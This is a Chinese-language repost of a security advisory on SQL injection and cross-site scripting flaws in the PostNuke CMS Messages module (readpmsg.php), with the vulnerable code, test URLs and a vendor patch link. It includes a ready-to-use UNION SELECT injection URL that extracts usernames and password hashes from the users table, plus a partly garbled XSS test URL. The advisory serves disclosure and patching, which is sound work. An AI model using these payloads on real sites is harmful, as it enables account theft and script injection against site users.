	设为首页		友情链接
	在线留言		发表文章
	加入收藏		广告联系

专题：

SOA

您现在的位置： IT公社 IT community >> 私服架设 >> 千年私服 >> 教程正文

用户登录

新用户注册

专题栏目

　　PostNuke SQL注入和跨站脚本漏洞

PostNuke SQL注入和跨站脚本漏洞

受影响系统：
PostNuke PostNuke 0.76 RC4a
PostNuke PostNuke 0.76 RC4
PostNuke PostNuke 0.750
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 13789

PostNuke是开放源码，开放开发的内容管理系统（CMS）。

PostNuke中存在SQL注入和跨站脚本漏洞，影响Messages模块，可能允许攻击者修改SQL请求的逻辑，在用户浏览器上执行任意HTML和脚本代码。

PostNuke的readmsg.php脚本没有充分过滤start参数值，攻击者可以提交恶意SQL命令作为此参数数据，导致更改原来的SQL逻辑，可造成数据库更改或信息泄露。

<*来源：sp3x （sp3x@securityreason.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111721364707520&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]=＇" . (int)pnVarPrepForStore($userdata) . "＇";

$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "
";
forumerror(0005);
}
=======================

首先登陆到postnuke，然后向自己发送消息，之后：
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

注意：
------
total_messages=1 - total_messages的ID必须存在。

之后就可以看到以下错误消息：

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near ＇[SQL injection],1＇ at line 10 \
========================

SQL注入攻击：
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

跨站脚本攻击：
============================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0＇

cXIb8O3 and sp3x - SecurityReason

&total_messages=1

然后就可以得到：

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for t

right syntax to use near ＇＇[Our XSS],1＇ at line 10 \
========================

建议：
--------------------------------------------------------------------------------
厂商补丁：

PostNuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html

频道声明：本频道的文章除部分特别声明禁止转载的专稿外，可以自由转载.但请务必注明出出处和原始作者文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。

原始作者:佚名	录入时间:2007-1-2 22:29:40
信息来源:不详	投稿信箱:itqoo@126.com

教程录入：itqoo 责任编辑：itqoo

上一个教程： Ethereal CDMA2000 A11报文处理模块远程缓冲区溢出漏洞

下一个教程： Firefox搜索插件跨站脚本执行漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

- 关于我们 - 合作伙伴 - 友情链接 - 广告刊登 - 投稿热线 - 在线留言 - 版权声明 - 联系方式 -
	IT公社版权所有粤ICP备05127012号
	Copyrigh@2005-2006 itqoo.com.Inc All Rights Reserved 推荐分辨率 1024*768
	联系站长：E-Mail:itqoo@126.com MSN:urchincc@hotmail.com QQ:
	特别感谢:亿太网络提供空间支持